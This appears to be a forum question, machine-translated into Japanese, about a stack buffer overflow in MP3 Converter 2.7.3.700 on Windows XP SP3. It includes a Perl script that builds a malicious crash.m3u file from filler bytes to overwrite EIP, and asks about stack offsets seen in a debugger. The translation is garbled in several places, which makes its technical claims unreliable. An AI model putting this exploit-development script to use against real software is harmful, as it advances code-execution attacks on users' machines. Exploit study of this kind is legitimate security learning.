0
はいつか戻って、WindowsのXP SP3(http://www.exploit-db.com/exploits/9177/)上のMP3コンバータ2.7.3.700に簡単にRMの悪用に取り組んで、私は理解していないですコンセプトに出くわし、それはこのように書きます:シェルコードの開発、ESPポインタ
悪意のあるファイルを生成するperlスクリプト:悪意のあるファイルを生成した後
my $junk = "\x41" x 25000;
my $offset = "\x42" x 1072;
my $eip = "\x43" x 4;
my $file = "crash.m3u";
open ($file,">$file");
print $file $junk.$offset.$eip.$adjustment;
close ($file);
を、コンバータにそれを供給し、これらは、なぜそれらは、... [ESP + 18](ESPに対してアドレッシング)でスタックの内容を解析Aはここですか?
I意味:
[ESP-43C]に[ESP-88E8]からAの開始
[ESP-C] [ESP-8]で
C年代に[ESP-438]からBの開始
これらのAは[ESP + 18]から[ESP + 418]に戻っているのはなぜですか?なぜ[ESP + 18E]から[ESP-43C]に配置されたときに、[ESP + 18]〜[ESP + 418]でこれらのAが繰り返されているのですか?
ありがとうございます。